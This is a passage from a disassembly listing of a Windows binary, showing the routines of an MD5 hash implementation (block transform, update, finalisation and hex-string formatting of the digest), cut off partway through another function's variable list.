mov dl, [eax+2]
movzx esi, byte ptr [eax+1]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+5]
mov [ebp+var_40], edx
xor edx, edx
mov dh, [eax+7]
mov dl, [eax+6]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+4]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+9]
mov [ebp+var_3C], edx
xor edx, edx
mov dh, [eax+0Bh]
mov dl, [eax+0Ah]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+8]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+0Dh]
mov [ebp+var_38], edx
xor edx, edx
mov dh, [eax+0Fh]
mov dl, [eax+0Eh]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+0Ch]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+11h]
mov [ebp+var_34], edx
xor edx, edx
mov dh, [eax+13h]
mov dl, [eax+12h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+10h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+15h]
mov [ebp+var_30], edx
xor edx, edx
mov dh, [eax+17h]
mov dl, [eax+16h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+14h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+19h]
mov [ebp+var_2C], edx
xor edx, edx
mov dh, [eax+1Bh]
mov dl, [eax+1Ah]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+18h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+1Dh]
mov [ebp+var_28], edx
xor edx, edx
mov dh, [eax+1Fh]
mov dl, [eax+1Eh]
shl edx, 8
or edx, esi
shl edx, 8
movzx esi, byte ptr [eax+1Ch]
or edx, esi
movzx esi, byte ptr [eax+21h]
mov [ebp+var_24], edx
xor edx, edx
mov dh, [eax+23h]
mov dl, [eax+22h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+20h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+25h]
mov [ebp+var_20], edx
xor edx, edx
mov dh, [eax+27h]
mov dl, [eax+26h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+24h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+29h]
mov [ebp+var_1C], edx
xor edx, edx
mov dh, [eax+2Bh]
mov dl, [eax+2Ah]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+28h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+2Dh]
mov [ebp+var_18], edx
xor edx, edx
mov dh, [eax+2Fh]
mov dl, [eax+2Eh]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+2Ch]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+31h]
mov [ebp+var_14], edx
xor edx, edx
mov dh, [eax+33h]
mov dl, [eax+32h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+30h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+35h]
mov [ebp+var_10], edx
xor edx, edx
mov dh, [eax+37h]
mov dl, [eax+36h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+34h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+39h]
mov [ebp+var_C], edx
xor edx, edx
mov dh, [eax+3Bh]
mov dl, [eax+3Ah]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+38h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+3Dh]
mov [ebp+var_8], edx
xor edx, edx
mov dh, [eax+3Fh]
mov dl, [eax+3Eh]
movzx eax, byte ptr [eax+3Ch]
shl edx, 8
or edx, esi
shl edx, 8
mov esi, [ecx+14h]
mov edi, [ecx+10h]
mov ebx, [ecx+0Ch]
or edx, eax
mov eax, [ecx+8]
mov [ebp+var_4], edx
mov edx, esi
xor edx, edi
and edx, ebx
xor edx, esi
add edx, eax
mov eax, [ebp+var_40]
lea edx, [edx+eax-28955B88h]
mov eax, edx
shr eax, 19h
shl edx, 7
or eax, edx
mov edx, edi
add eax, ebx
xor edx, ebx
and edx, eax
xor edx, edi
add edx, [ebp+var_3C]
lea esi, [esi+edx-173848AAh]
mov edx, esi
shr edx, 14h
shl esi, 0Ch
or edx, esi
mov esi, ebx
add edx, eax
xor esi, eax
and esi, edx
xor esi, ebx
mov ebx, edx
add esi, [ebp+var_38]
xor ebx, eax
lea edi, [edi+esi+242070DBh]
mov esi, edi
shr esi, 0Fh
shl edi, 11h
or esi, edi
mov edi, [ecx+0Ch]
add esi, edx
and ebx, esi
xor ebx, eax
add ebx, [ebp+var_34]
lea edi, [edi+ebx-3E423112h]
mov ebx, edi
shl ebx, 16h
shr edi, 0Ah
or ebx, edi
mov edi, edx
add ebx, esi
xor edi, esi
and edi, ebx
mov [ebp+arg_0], ebx
xor edi, edx
add edi, [ebp+var_30]
lea eax, [eax+edi-0A83F051h]
mov edi, eax
shr edi, 19h
shl eax, 7
or edi, eax
mov eax, esi
add edi, ebx
xor eax, ebx
and eax, edi
xor eax, esi
add eax, [ebp+var_2C]
lea edx, [edx+eax+4787C62Ah]
mov eax, edx
shr eax, 14h
shl edx, 0Ch
or eax, edx
mov edx, ebx
add eax, edi
xor edx, edi
and edx, eax
xor edx, ebx
add edx, [ebp+var_28]
lea esi, [esi+edx-57CFB9EDh]
mov edx, esi
shr edx, 0Fh
shl esi, 11h
or edx, esi
mov esi, eax
add edx, eax
xor esi, edi
and esi, edx
xor esi, edi
add esi, [ebp+var_24]
lea esi, [ebx+esi-2B96AFFh]
mov ebx, esi
shl ebx, 16h
shr esi, 0Ah
or ebx, esi
mov esi, eax
xor esi, edx
add ebx, edx
and esi, ebx
mov [ebp+arg_0], ebx
xor esi, eax
add esi, [ebp+var_20]
lea edi, [edi+esi+698098D8h]
mov esi, edi
shr esi, 19h
shl edi, 7
or esi, edi
mov edi, edx
add esi, ebx
xor edi, ebx
and edi, esi
xor edi, edx
add edi, [ebp+var_1C]
lea eax, [eax+edi-74BB0851h]
mov edi, eax
shr edi, 14h
shl eax, 0Ch
or edi, eax
mov eax, ebx
add edi, esi
xor eax, esi
and eax, edi
xor eax, ebx
add eax, [ebp+var_18]
lea edx, [edx+eax-0A44Fh]
mov eax, edx
shr eax, 0Fh
shl edx, 11h
or eax, edx
mov edx, edi
add eax, edi
xor edx, esi
and edx, eax
xor edx, esi
add edx, [ebp+var_14]
lea edx, [ebx+edx-76A32842h]
mov ebx, edx
shl ebx, 16h
shr edx, 0Ah
or ebx, edx
mov edx, edi
add ebx, eax
xor edx, eax
and edx, ebx
mov [ebp+arg_0], ebx
xor edx, edi
add edx, [ebp+var_10]
lea esi, [esi+edx+6B901122h]
mov edx, esi
shr edx, 19h
shl esi, 7
or edx, esi
mov esi, eax
add edx, ebx
xor esi, ebx
and esi, edx
xor esi, eax
add esi, [ebp+var_C]
lea edi, [edi+esi-2678E6Dh]
mov ebx, edi
shr ebx, 14h
shl edi, 0Ch
or ebx, edi
mov edi, [ebp+arg_0]
mov esi, edi
add ebx, edx
xor esi, edx
and esi, ebx
xor esi, edi
add esi, [ebp+var_8]
lea eax, [eax+esi-5986BC72h]
mov esi, eax
shr esi, 0Fh
shl eax, 11h
or esi, eax
mov eax, ebx
add esi, ebx
xor eax, edx
and eax, esi
xor eax, edx
add eax, [ebp+var_4]
lea edi, [edi+eax+49B40821h]
mov eax, edi
shl eax, 16h
shr edi, 0Ah
or eax, edi
mov edi, esi
add eax, esi
xor edi, eax
and edi, ebx
xor edi, esi
add edi, [ebp+var_3C]
lea edx, [edx+edi-9E1DA9Eh]
mov edi, edx
shr edi, 1Bh
shl edx, 5
or edi, edx
mov edx, eax
add edi, eax
xor edx, edi
and edx, esi
xor edx, eax
add edx, [ebp+var_28]
lea ebx, [ebx+edx-3FBF4CC0h]
mov edx, ebx
shr edx, 17h
shl ebx, 9
or edx, ebx
add edx, edi
mov ebx, edx
xor ebx, edi
and ebx, eax
xor ebx, edi
add ebx, [ebp+var_14]
lea esi, [esi+ebx+265E5A51h]
mov ebx, esi
shr ebx, 12h
shl esi, 0Eh
or ebx, esi
mov esi, edx
add ebx, edx
xor esi, ebx
and esi, edi
xor esi, edx
add esi, [ebp+var_40]
lea eax, [eax+esi-16493856h]
mov esi, eax
shl esi, 14h
shr eax, 0Ch
or esi, eax
mov eax, ebx
add esi, ebx
xor eax, esi
and eax, edx
xor eax, ebx
add eax, [ebp+var_2C]
lea edi, [edi+eax-29D0EFA3h]
mov eax, edi
shr eax, 1Bh
shl edi, 5
or eax, edi
add eax, esi
mov edi, esi
xor edi, eax
and edi, ebx
xor edi, esi
add edi, [ebp+var_18]
lea edx, [edx+edi+2441453h]
mov edi, edx
shr edi, 17h
shl edx, 9
or edi, edx
add edi, eax
mov edx, edi
xor edx, eax
and edx, esi
xor edx, eax
add edx, [ebp+var_4]
lea ebx, [ebx+edx-275E197Fh]
mov edx, ebx
shr edx, 12h
shl ebx, 0Eh
or edx, ebx
mov ebx, edi
add edx, edi
xor ebx, edx
and ebx, eax
xor ebx, edi
add ebx, [ebp+var_30]
lea esi, [esi+ebx-182C0438h]
mov ebx, esi
shl ebx, 14h
shr esi, 0Ch
or ebx, esi
mov esi, edx
add ebx, edx
xor esi, ebx
and esi, edi
xor esi, edx
add esi, [ebp+var_1C]
lea eax, [eax+esi+21E1CDE6h]
mov esi, eax
shr esi, 1Bh
shl eax, 5
or esi, eax
mov eax, ebx
add esi, ebx
xor eax, esi
and eax, edx
xor eax, ebx
add eax, [ebp+var_8]
lea edi, [edi+eax-3CC8F82Ah]
mov eax, edi
shr eax, 17h
shl edi, 9
or eax, edi
add eax, esi
mov edi, eax
xor edi, esi
and edi, ebx
xor edi, esi
add edi, [ebp+var_34]
lea edx, [edx+edi-0B2AF279h]
mov edi, edx
shr edi, 12h
shl edx, 0Eh
or edi, edx
mov edx, eax
add edi, eax
xor edx, edi
and edx, esi
xor edx, eax
add edx, [ebp+var_20]
lea ebx, [ebx+edx+455A14EDh]
mov edx, ebx
shl edx, 14h
shr ebx, 0Ch
or edx, ebx
mov ebx, edi
add edx, edi
xor ebx, edx
and ebx, eax
xor ebx, edi
add ebx, [ebp+var_C]
lea esi, [esi+ebx-561C16FBh]
mov ebx, esi
shr ebx, 1Bh
shl esi, 5
or ebx, esi
mov esi, edx
add ebx, edx
xor esi, ebx
and esi, edi
xor esi, edx
add esi, [ebp+var_38]
lea eax, [eax+esi-3105C08h]
mov esi, eax
shr esi, 17h
shl eax, 9
or esi, eax
add esi, ebx
mov eax, esi
mov [ebp+arg_0], esi
xor eax, ebx
and eax, edx
xor eax, ebx
add eax, [ebp+var_24]
lea eax, [edi+eax+676F02D9h]
mov edi, eax
shr edi, 12h
shl eax, 0Eh
or edi, eax
add edi, esi
xor [ebp+arg_0], edi
mov eax, [ebp+arg_0]
and eax, ebx
xor eax, esi
add eax, [ebp+var_10]
lea edx, [edx+eax-72D5B376h]
mov eax, edx
shl eax, 14h
shr edx, 0Ch
or eax, edx
mov edx, [ebp+arg_0]
add eax, edi
xor edx, eax
add edx, [ebp+var_2C]
lea ebx, [ebx+edx-5C6BEh]
mov edx, ebx
shr edx, 1Ch
shl ebx, 4
or edx, ebx
mov ebx, edi
add edx, eax
xor ebx, eax
xor ebx, edx
add ebx, [ebp+var_20]
lea esi, [esi+ebx-788E097Fh]
mov ebx, esi
shr ebx, 15h
shl esi, 0Bh
or ebx, esi
add ebx, edx
mov esi, ebx
mov [ebp+arg_0], ebx
xor esi, eax
xor esi, edx
add esi, [ebp+var_14]
lea edi, [edi+esi+6D9D6122h]
mov esi, edi
shr esi, 10h
shl edi, 10h
or esi, edi
add esi, ebx
xor [ebp+arg_0], esi
mov edi, [ebp+arg_0]
xor edi, edx
add edi, [ebp+var_8]
lea edi, [eax+edi-21AC7F4h]
mov eax, edi
shl eax, 17h
shr edi, 9
or eax, edi
add eax, esi
mov edi, [ebp+arg_0]
xor edi, eax
add edi, [ebp+var_3C]
lea edi, [edx+edi-5B4115BCh]
mov edx, edi
shr edx, 1Ch
shl edi, 4
or edx, edi
mov edi, esi
add edx, eax
xor edi, eax
xor edi, edx
add edi, [ebp+var_30]
lea ebx, [ebx+edi+4BDECFA9h]
mov edi, ebx
shr edi, 15h
shl ebx, 0Bh
or edi, ebx
add edi, edx
mov ebx, edi
mov [ebp+arg_0], edi
xor ebx, eax
xor ebx, edx
add ebx, [ebp+var_24]
lea esi, [esi+ebx-944B4A0h]
mov ebx, esi
shr ebx, 10h
shl esi, 10h
or ebx, esi
add ebx, edi
xor [ebp+arg_0], ebx
mov esi, [ebp+arg_0]
xor esi, edx
add esi, [ebp+var_18]
lea esi, [eax+esi-41404390h]
mov eax, esi
shl eax, 17h
shr esi, 9
or eax, esi
mov esi, [ebp+arg_0]
add eax, ebx
xor esi, eax
add esi, [ebp+var_C]
lea esi, [edx+esi+289B7EC6h]
mov edx, esi
shr edx, 1Ch
shl esi, 4
or edx, esi
mov esi, ebx
add edx, eax
xor esi, eax
xor esi, edx
add esi, [ebp+var_40]
lea edi, [edi+esi-155ED806h]
mov esi, edi
shr esi, 15h
shl edi, 0Bh
or esi, edi
add esi, edx
mov edi, esi
mov [ebp+arg_0], esi
xor edi, eax
xor edi, edx
add edi, [ebp+var_34]
lea ebx, [ebx+edi-2B10CF7Bh]
mov edi, ebx
shr edi, 10h
shl ebx, 10h
or edi, ebx
add edi, esi
xor [ebp+arg_0], edi
mov ebx, [ebp+arg_0]
xor ebx, edx
add ebx, [ebp+var_28]
lea ebx, [eax+ebx+4881D05h]
mov eax, ebx
shl eax, 17h
shr ebx, 9
or eax, ebx
mov ebx, [ebp+arg_0]
add eax, edi
xor ebx, eax
add ebx, [ebp+var_1C]
lea ebx, [edx+ebx-262B2FC7h]
mov edx, ebx
shr edx, 1Ch
shl ebx, 4
or edx, ebx
mov ebx, edi
xor ebx, eax
add edx, eax
xor ebx, edx
add ebx, [ebp+var_10]
lea ebx, [esi+ebx-1924661Bh]
mov esi, ebx
shr esi, 15h
shl ebx, 0Bh
or esi, ebx
add esi, edx
mov ebx, esi
xor ebx, eax
xor ebx, edx
add ebx, [ebp+var_4]
lea ebx, [edi+ebx+1FA27CF8h]
mov edi, ebx
shr edi, 10h
shl ebx, 10h
or edi, ebx
mov ebx, esi
add edi, esi
xor ebx, edi
xor ebx, edx
add ebx, [ebp+var_38]
lea eax, [eax+ebx-3B53A99Bh]
mov ebx, eax
shl ebx, 17h
shr eax, 9
or ebx, eax
mov eax, esi
add ebx, edi
not eax
or eax, ebx
xor eax, edi
add eax, [ebp+var_40]
lea edx, [edx+eax-0BD6DDBCh]
mov eax, edx
shr eax, 1Ah
shl edx, 6
or eax, edx
mov edx, edi
add eax, ebx
not edx
or edx, eax
xor edx, ebx
add edx, [ebp+var_24]
lea esi, [esi+edx+432AFF97h]
mov edx, esi
shr edx, 16h
shl esi, 0Ah
or edx, esi
mov esi, ebx
add edx, eax
not esi
or esi, edx
xor esi, eax
add esi, [ebp+var_8]
lea edi, [edi+esi-546BDC59h]
mov esi, edi
shr esi, 11h
shl edi, 0Fh
or esi, edi
mov edi, eax
add esi, edx
not edi
or edi, esi
xor edi, edx
add edi, [ebp+var_2C]
lea ebx, [ebx+edi-36C5FC7h]
mov edi, ebx
shl edi, 15h
shr ebx, 0Bh
or edi, ebx
mov ebx, edx
add edi, esi
not ebx
or ebx, edi
xor ebx, esi
add ebx, [ebp+var_10]
lea ebx, [eax+ebx+655B59C3h]
mov eax, ebx
shl ebx, 6
shr eax, 1Ah
or eax, ebx
mov ebx, esi
not ebx
add eax, edi
or ebx, eax
xor ebx, edi
add ebx, [ebp+var_34]
lea ebx, [edx+ebx-70F3336Eh]
mov edx, ebx
shl ebx, 0Ah
shr edx, 16h
or edx, ebx
mov ebx, edi
not ebx
add edx, eax
or ebx, edx
xor ebx, eax
add ebx, [ebp+var_18]
lea ebx, [esi+ebx-100B83h]
mov esi, ebx
shl ebx, 0Fh
shr esi, 11h
or esi, ebx
mov ebx, eax
add esi, edx
not ebx
or ebx, esi
xor ebx, edx
add ebx, [ebp+var_3C]
lea ebx, [edi+ebx-7A7BA22Fh]
mov edi, ebx
shl edi, 15h
shr ebx, 0Bh
or edi, ebx
mov ebx, edx
add edi, esi
not ebx
or ebx, edi
xor ebx, esi
add ebx, [ebp+var_20]
lea ebx, [eax+ebx+6FA87E4Fh]
mov eax, ebx
shr eax, 1Ah
shl ebx, 6
or eax, ebx
mov ebx, esi
add eax, edi
not ebx
or ebx, eax
xor ebx, edi
add ebx, [ebp+var_4]
lea ebx, [edx+ebx-1D31920h]
mov edx, ebx
shr edx, 16h
shl ebx, 0Ah
or edx, ebx
mov ebx, edi
add edx, eax
not ebx
or ebx, edx
xor ebx, eax
add ebx, [ebp+var_28]
lea ebx, [esi+ebx-5CFEBCECh]
mov esi, ebx
shr esi, 11h
shl ebx, 0Fh
or esi, ebx
mov ebx, eax
add esi, edx
not ebx
or ebx, esi
xor ebx, edx
add ebx, [ebp+var_C]
lea ebx, [edi+ebx+4E0811A1h]
mov edi, ebx
shl edi, 15h
shr ebx, 0Bh
or edi, ebx
mov ebx, edx
add edi, esi
not ebx
or ebx, edi
xor ebx, esi
add ebx, [ebp+var_30]
lea ebx, [eax+ebx-8AC817Eh]
mov eax, ebx
shr eax, 1Ah
shl ebx, 6
or eax, ebx
mov ebx, esi
add eax, edi
not ebx
or ebx, eax
xor ebx, edi
add ebx, [ebp+var_14]
lea edx, [edx+ebx-42C50DCBh]
mov ebx, edx
shr ebx, 16h
shl edx, 0Ah
or ebx, edx
mov edx, edi
add ebx, eax
not edx
or edx, ebx
xor edx, eax
add edx, [ebp+var_38]
lea esi, [esi+edx+2AD7D2BBh]
mov edx, esi
shr edx, 11h
shl esi, 0Fh
or edx, esi
mov esi, eax
add edx, ebx
not esi
or esi, edx
xor esi, ebx
add esi, [ebp+var_1C]
lea edi, [edi+esi-14792C6Fh]
mov esi, [ecx+8]
add esi, eax
mov eax, edi
shl eax, 15h
shr edi, 0Bh
or eax, edi
mov [ecx+8], esi
add eax, [ecx+0Ch]
pop edi
pop esi
add eax, edx
mov [ecx+0Ch], eax
mov eax, [ecx+10h]
add eax, edx
mov [ecx+10h], eax
mov eax, [ecx+14h]
add eax, ebx
pop ebx
mov [ecx+14h], eax
leave
retn 4
sub_41C2AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CC38 proc near ; CODE XREF: sub_41CCCB+66�p
; sub_41CCCB+73�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, ecx
mov ecx, [ebp+arg_4]
push edi
test ecx, ecx
jz short loc_41CCC5
mov eax, [esi]
push ebx
mov edi, eax
push 40h
and edi, 3Fh
pop ebx
add eax, ecx
sub ebx, edi
cmp eax, ecx
mov [esi], eax
jnb short loc_41CC5E
inc dword ptr [esi+4]
loc_41CC5E: ; CODE XREF: sub_41CC38+21�j
test edi, edi
jz short loc_41CC8D
cmp ecx, ebx
jb short loc_41CC8D
push ebx
lea eax, [edi+esi+18h]
push [ebp+arg_0]
push eax
call sub_4223F0
add esp, 0Ch
lea eax, [esi+18h]
mov ecx, esi
push eax
call sub_41C2AB
sub [ebp+arg_4], ebx
add [ebp+arg_0], ebx
mov ecx, [ebp+arg_4]
xor edi, edi
loc_41CC8D: ; CODE XREF: sub_41CC38+28�j
; sub_41CC38+2C�j
cmp ecx, 40h
jb short loc_41CCAF
mov ebx, ecx
shr ebx, 6
loc_41CC97: ; CODE XREF: sub_41CC38+72�j
push [ebp+arg_0]
mov ecx, esi
call sub_41C2AB
sub [ebp+arg_4], 40h
add [ebp+arg_0], 40h
dec ebx
jnz short loc_41CC97
mov ecx, [ebp+arg_4]
loc_41CCAF: ; CODE XREF: sub_41CC38+58�j
test ecx, ecx
pop ebx
jz short loc_41CCC5
push ecx
lea eax, [edi+esi+18h]
push [ebp+arg_0]
push eax
call sub_4223F0
add esp, 0Ch
loc_41CCC5: ; CODE XREF: sub_41CC38+C�j
; sub_41CC38+7A�j
pop edi
pop esi
pop ebp
retn 8
sub_41CC38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CCCB proc near ; CODE XREF: sub_41CDB7+24�p
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push edi
push 38h
mov edi, [esi]
mov eax, [esi+4]
mov ecx, edi
shl eax, 3
shr ecx, 1Dh
or eax, ecx
mov ecx, edi
shl ecx, 3
mov edx, ecx
mov [ebp+var_8], cl
shr edx, 8
mov [ebp+var_7], dl
mov edx, ecx
shr ecx, 18h
mov [ebp+var_5], cl
mov ecx, eax
shr ecx, 8
mov [ebp+var_3], cl
mov [ebp+var_4], al
mov ecx, eax
and edi, 3Fh
shr eax, 18h
mov [ebp+var_1], al
pop eax
shr edx, 10h
shr ecx, 10h
cmp edi, eax
mov [ebp+var_6], dl
mov [ebp+var_2], cl
jb short loc_41CD27
push 78h
pop eax
loc_41CD27: ; CODE XREF: sub_41CCCB+57�j
sub eax, edi
mov ecx, esi
push eax
push offset dword_448C58
call sub_41CC38
lea eax, [ebp+var_8]
push 8
push eax
mov ecx, esi
call sub_41CC38
mov eax, [ebp+arg_0]
mov cl, [esi+8]
pop edi
mov [eax], cl
mov ecx, [esi+8]
shr ecx, 8
mov [eax+1], cl
mov cl, [esi+0Ah]
mov [eax+2], cl
mov cl, [esi+0Bh]
mov [eax+3], cl
mov cl, [esi+0Ch]
mov [eax+4], cl
mov ecx, [esi+0Ch]
shr ecx, 8
mov [eax+5], cl
mov cl, [esi+0Eh]
mov [eax+6], cl
mov cl, [esi+0Fh]
mov [eax+7], cl
mov cl, [esi+10h]
mov [eax+8], cl
mov ecx, [esi+10h]
shr ecx, 8
mov [eax+9], cl
mov cl, [esi+12h]
mov [eax+0Ah], cl
mov cl, [esi+13h]
mov [eax+0Bh], cl
mov cl, [esi+14h]
mov [eax+0Ch], cl
mov ecx, [esi+14h]
shr ecx, 8
mov [eax+0Dh], cl
mov cl, [esi+16h]
mov [eax+0Eh], cl
mov cl, [esi+17h]
mov [eax+0Fh], cl
pop esi
leave
retn 4
sub_41CCCB endp
; =============== S U B R O U T I N E =======================================
sub_41CDB7 proc near ; CODE XREF: sub_41CE88+3E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
call sub_41C287
push [esp+4+arg_0]
call sub_422120
pop ecx
push eax
mov ecx, esi
push [esp+8+arg_0]
call sub_41CC38
push [esp+4+arg_4]
mov ecx, esi
call sub_41CCCB
pop esi
retn 8
sub_41CDB7 endp
; =============== S U B R O U T I N E =======================================
sub_41CDE4 proc near ; CODE XREF: sub_41CE88+46�p
arg_0 = dword ptr 4
push esi
push 1
push 28h
call sub_423F63
mov esi, eax
mov eax, [esp+0Ch+arg_0]
movzx ecx, byte ptr [eax+10h]
push ecx
movzx ecx, byte ptr [eax+0Fh]
push ecx
movzx ecx, byte ptr [eax+0Eh]
push ecx
movzx ecx, byte ptr [eax+0Dh]
push ecx
movzx ecx, byte ptr [eax+0Ch]
push ecx
movzx ecx, byte ptr [eax+0Bh]
push ecx
movzx ecx, byte ptr [eax+0Ah]
push ecx
movzx ecx, byte ptr [eax+9]
push ecx
movzx ecx, byte ptr [eax+8]
push ecx
movzx ecx, byte ptr [eax+7]
push ecx
movzx ecx, byte ptr [eax+6]
push ecx
movzx ecx, byte ptr [eax+5]
push ecx
movzx ecx, byte ptr [eax+4]
push ecx
movzx ecx, byte ptr [eax+3]
push ecx
movzx ecx, byte ptr [eax+2]
push ecx
movzx ecx, byte ptr [eax+1]
movzx eax, byte ptr [eax]
push ecx
push eax
push offset a02x02x02x02x02 ; "%02x%02x%02x%02x%02x%02x%02x%02x%02x%02"...
push esi
call sub_422063
add esp, 54h
mov eax, esi
pop esi
retn 4
sub_41CDE4 endp
; =============== S U B R O U T I N E =======================================
sub_41CE5C proc near ; CODE XREF: sub_41C27B+3�p
push esi
mov esi, ecx
push 40h
push 0
lea eax, [esi+18h]
push eax
call sub_4221F0
push 10h
lea eax, [esi+8]
push 0
push eax
call sub_4221F0
push 8
push 0
push esi
call sub_4221F0
add esp, 24h
pop esi
retn
sub_41CE5C endp
; =============== S U B R O U T I N E =======================================
sub_41CE88 proc near ; CODE XREF: sub_403B2C+81B�p
; sub_419B2F+20E�p
mov eax, offset loc_42EF4A
call sub_423A68
push ecx
push esi
push edi
push 58h
call sub_423F55
pop ecx
mov ecx, eax
mov [ebp-10h], ecx
xor esi, esi
cmp ecx, esi
mov [ebp-4], esi
jz short loc_41CEB2
call sub_41C27B
mov esi, eax
loc_41CEB2: ; CODE XREF: sub_41CE88+21�j
or dword ptr [ebp-4], 0FFFFFFFFh
push 11h
call sub_423F55
pop ecx
mov edi, eax
push edi
mov ecx, esi
push dword ptr [ebp+8]
call sub_41CDB7
push edi
mov ecx, esi
call sub_41CDE4
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov large fs:0, ecx
leave
retn
sub_41CE88 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CEE1 proc near ; CODE XREF: sub_403B2C+2ED�p
; sub_403B2C+3DD�p ...
var_448 = byte ptr -448h
var_298 = byte ptr -298h
var_E8 = byte ptr -0E8h
var_E7 = byte ptr -0E7h
var_E6 = byte ptr -0E6h
var_E5 = byte ptr -0E5h
var_E4 = byte ptr -0E4h
var_E3 = byte ptr -0E3h
var_E2 = byte ptr -0E2h
var_E1 = byte ptr -0E1h
var_E0 = byte ptr -0E0h
var_DF = byte ptr -0DFh
var_DE = byte ptr -0DEh
var_DD = byte ptr -0DDh
var_DC = byte ptr -0DCh
var_DB = byte ptr -0DBh
var_DA = byte ptr -0DAh
var_D9 = byte ptr -0D9h
var_D8 = byte ptr -0D8h
var_D7 = byte ptr -0D7h
var_D6 = byte ptr -0D6h
var_D5 = byte ptr -0D5h
var_D4 = byte ptr -0D4h
var_D3 = byte ptr -0D3h
var_D2 = byte ptr -0D2h
var_D1 = byte ptr -0D1h
var_D0 = byte ptr -0D0h
var_CF = byte ptr -0CFh
var_CE = byte ptr -0CEh
var_CD = byte ptr -0CDh
var_CC = byte ptr -0CCh
var_CB = byte ptr -0CBh
var_CA = byte ptr -0CAh
var_C9 = byte ptr -0C9h
var_C8 = byte ptr -0C8h
var_C7 = byte ptr -0C7h
var_C6 = byte ptr -0C6h
var_C5 = byte ptr -0C5h
var_C4 = byte ptr -0C4h
var_C3 = byte ptr -0C3h
var_C2 = byte ptr -0C2h
var_C1 = byte ptr -0C1h
var_C0 = byte ptr -0C0h
var_BF = byte ptr -0BFh
var_BE = byte ptr -0BEh
var_BD = byte ptr -0BDh
var_BC = byte ptr -0BCh
var_BB = byte ptr -0BBh
var_BA = byte ptr -0BAh
var_B9 = byte ptr -0B9h
var_B8 = byte ptr -0B8h
var_B7 = byte ptr -0B7h
var_B6 = byte ptr -0B6h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_B2 = byte ptr -0B2h
var_B1 = byte ptr -0B1h
var_B0 = byte ptr -0B0h
var_AF = byte ptr -0AFh
var_AE = byte ptr -0AEh
var_AD = byte ptr -0ADh
var_AC = byte ptr -0ACh
var_AB = byte ptr -0ABh
var_AA = byte ptr -0AAh
var_A9 = byte ptr -0A9h
var_A8 = byte ptr -0A8h
var_A7 = byte ptr -0A7h
var_A6 = byte ptr -0A6h
var_A5 = byte ptr -0A5h
var_A4 = byte ptr -0A4h
var_A3 = byte ptr -0A3h
var_A2 = byte ptr -0A2h
var_A1 = byte ptr -0A1h
var_A0 = byte ptr -0A0h
var_9F = byte ptr -9Fh
var_9E = byte ptr -9Eh
var_9D = byte ptr -9Dh
var_9C = byte ptr -9Ch
var_9B = byte ptr -9Bh
var_9A = byte ptr -9Ah
var_99 = byte ptr -99h
var_98 = byte ptr -98h
var_97 = byte ptr -97h
var_96 = byte ptr -96h
var_95 = byte ptr -95h
var_94 = byte ptr -94h
var_93 = byte ptr -93h
var_92 = byte ptr -92h
var_91 = byte ptr -91h
var_90 = byte ptr -90h
var_8F = byte ptr -8Fh
var_8E = byte ptr -8Eh
var_8D = byte ptr -8Dh
var_8C = byte ptr -8Ch
var_8B = byte ptr -8Bh
var_8A = byte ptr -8Ah
var_89 = byte ptr -89h
var_88 = byte ptr -88h
var_87 = byte ptr -87h
var_86 = byte ptr -86h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
var_83 = byte ptr -83h
var_82 = byte ptr -82h
var_81 = byte ptr -81h
var_80 = byte ptr -80h
var_7F = byte ptr -7Fh
var_7E = byte ptr -7Eh
var_7D = byte ptr -7Dh
var_7C = byte ptr -7Ch
var_7B = byte ptr -7Bh
var_7A = byte ptr -7Ah
var_79 = byte ptr -79h
var_78 = byte ptr -78h
var_77 = byte ptr -77h
var_76 = byte ptr -76h
var_75 = byte ptr -75h
var_74 = byte ptr -74h
var_73 = byte ptr -73h
var_72 = byte ptr -72h
var_71 = byte ptr -71h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = byte ptr -6Eh
var_6D = byte ptr -6Dh
var_6C = byte ptr -6Ch
var_6B = byte ptr -6Bh
var_6A = byte ptr -6Ah
var_69 = byte ptr -69h
var_68 = byte ptr -68h
var_67 = byte ptr -67h
var_66 = byte ptr -66h
var_65 = byte ptr -65h
var_64 = byte ptr -64h
